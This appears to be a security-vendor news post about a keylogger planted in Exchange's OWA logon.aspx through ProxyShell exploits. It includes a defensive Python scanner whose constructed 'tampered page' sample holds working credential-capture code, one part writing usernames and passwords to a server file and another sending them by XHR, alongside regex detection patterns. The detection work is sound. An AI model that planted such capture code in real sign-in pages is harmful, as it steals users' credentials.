Companies And Governments At Risk From Keylogger Discovered On Microsoft Exchange Server

SentryBay On The Keylogger Discovered On Microsoft Exchange Server

Cyber Threat Radar – A keylogger is being deployed by an unidentified threat actor through the exploitation of well-known, long-patched security vulnerabilities in Microsoft Exchange Server. The attacks are aimed at entities in Europe, the Middle East and Africa.

Russian cybersecurity analysts have identified more than 30 victims, including government organizations, financial institutions, technology firms, and educational establishments. The earliest known compromise dates back to 2021.

Countries Affected By Keylogger On Microsoft Exchange Server

The keylogger gathers the login details entered on the sign-in page and stores them in a file on the server that the attacker can then retrieve from the internet at a specific path. The countries affected by this intrusion campaign include:

Europe
Russia

Middle East
Jordan, Kuwait, Lebanon, Oman, United Arab Emirates

Africa
Ethiopia, Mauritius, Niger, Nigeria

Microsoft Exchange Server ProxyShell Vulnerability Exploited

The attack sequences begin by exploiting the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), which Microsoft addressed in its April and May 2021 Exchange security updates. Chained together, the three flaws allow an unauthenticated attacker to bypass authentication, escalate privileges, and execute arbitrary code on the server.

After exploiting ProxyShell, the threat actors inject the keylogger into the server's Outlook Web Access sign-in page ("logon.aspx"). The injected code runs when the sign-in button is clicked: it captures the username and password that were entered and saves them to a file on the server that can be accessed from the internet.
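A defender's first question after reading the above is whether their own logon.aspx has been tampered with. The following script is an added example for this page, not SentryBay's code nor the researchers' tooling, and it does not reproduce the actual malware. It applies two generic heuristics to an OWA logon page: a server-side `<% %>` block that reads the submitted credential fields and calls a .NET file-write API, and an inline `<script>` that touches the credential fields and sends data over the network. It also compares the file against a known-good SHA-256 taken from a clean install of the same Exchange build. The file location and the two sample pages are assumptions constructed for illustration; the regular expressions are generic indicators, not signatures of this campaign.

```python
r"""
Heuristic scan of an Exchange OWA logon.aspx for injected credential capture.

Added example; not SentryBay's or the original researchers' code, and the
patterns are generic indicators rather than signatures of one campaign.
Assumed default location (Exchange 2016/2019):
  %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\logon.aspx
CLEAN_PAGE and TAMPERED_PAGE below are constructed stand-ins, not real files.
"""
import hashlib
import re
from pathlib import Path
from typing import List, Optional

# ASP.NET server-side code blocks, excluding <%@ directives and <%-- comments --%>.
SERVER_BLOCK = re.compile(r"<%(?![@-])(.*?)%>", re.DOTALL)
# Inline <script> blocks; blocks with src= load Exchange's own script files.
INLINE_SCRIPT = re.compile(r"<script\b(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.DOTALL | re.IGNORECASE)
# Server code reading the submitted credential fields from the request.
CRED_READ = re.compile(
    r"Request\s*(?:\.Form|\.Params|\.QueryString)?\s*[\[(]\s*[\"'](?:username|password|pwd|passwd|user)[\"']",
    re.IGNORECASE,
)
# .NET file-write APIs: credentials persisted to a file on the server.
FILE_WRITE = re.compile(r"File\.(?:Append|Write)All(?:Text|Lines|Bytes)|StreamWriter|FileStream")
# Client-side code that touches credential fields and sends data somewhere.
JS_CRED = re.compile(r"username|password|pwd", re.IGNORECASE)
JS_SEND = re.compile(r"XMLHttpRequest|fetch\s*\(|navigator\.sendBeacon|new\s+Image\s*\(", re.IGNORECASE)


def _snippet(text: str, limit: int = 70) -> str:
    return " ".join(text.split())[:limit]


def scan_logon_page(html: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing matched."""
    findings = []
    for block in SERVER_BLOCK.findall(html):
        if CRED_READ.search(block) and FILE_WRITE.search(block):
            findings.append("server-side code block reads submitted credentials and writes a file: " + _snippet(block))
    for script in INLINE_SCRIPT.findall(html):
        if JS_CRED.search(script) and JS_SEND.search(script):
            findings.append("inline script reads credential fields and sends them over the network: " + _snippet(script))
    return findings


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_baseline(content: bytes, known_good_sha256: str) -> bool:
    """True when the page matches the hash of a clean copy from the same Exchange build."""
    return sha256_hex(content) == known_good_sha256.lower()


def scan_file(path: Path, known_good_sha256: Optional[str] = None) -> List[str]:
    data = path.read_bytes()
    findings = scan_logon_page(data.decode("utf-8", errors="ignore"))
    if known_good_sha256 and not check_baseline(data, known_good_sha256):
        findings.append(f"{path} does not match the known-good hash")
    return findings


# Constructed minimal stand-in for a clean OWA logon page (not the real file).
CLEAN_PAGE = r"""<%@ Page language="C#" AutoEventWireup="false" %>
<html><head>
<script type="text/javascript" src="/owa/auth/scripts/flogon.js"></script>
<script>window.onload = function () { document.getElementById("username").focus(); };</script>
</head><body>
<form action="/owa/auth.owa" method="POST" name="logonForm">
<input id="username" name="username" type="text">
<input id="password" name="password" type="password">
<div class="signinbutton" id="signin" onclick="clkLgn()">sign in</div>
</form></body></html>
"""

# The same page with both kinds of injected capture code (constructed illustration).
TAMPERED_PAGE = CLEAN_PAGE.replace(
    "</form>",
    r"""</form>
<% string u = Request.Form["username"]; string p = Request.Form["password"];
   if (u != null) { System.IO.File.AppendAllText(Server.MapPath("~/auth/log.txt"), u + ":" + p + "\n"); } %>
<script>
document.getElementById("signin").addEventListener("click", function () {
  var x = new XMLHttpRequest();
  x.open("GET", "/owa/auth/logon.aspx?u=" + document.getElementById("username").value +
         "&p=" + document.getElementById("password").value);
  x.send();
});
</script>""",
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(name, scan_logon_page(page) or "no findings")
```

Against a live server, call `scan_file(Path(r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx"), known_good_sha256=...)` with the hash of the same file from a clean install of the same cumulative update (the default install path is an assumption; adjust it to your deployment). A hash mismatch alone is the stronger signal, since an attacker can trivially rewrite code to evade the regular expressions; the heuristics are there to tell you what changed, not to replace the baseline comparison.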

“As the first known compromise dates back to 2021, this confirms the attackers have been active for a significant period,” said Timothy Jenkins, Head of Cyberdefense Research, SentryBay. “It’s clear the stolen credentials could potentially be used for unauthorized access, data breaches, and further malicious activities.”

SentryBay’s Anti-Keylogging Technology Prevents Unauthorized Access

“The discovery of a keylogger on the Microsoft Exchange Server main page underscores the critical need for robust security measures,” commented Brent Agar, VP Strategic Partnerships, SentryBay. “This incident highlights the vulnerabilities that can be exploited through previously patched flaws like ProxyShell. This new keylogger puts many companies and governments at risk who must remain vigilant and continuously monitor their systems. At SentryBay, we emphasize the importance of proactive security solutions, including our advanced anti-keylogging technology, to protect sensitive information and prevent unauthorized access.”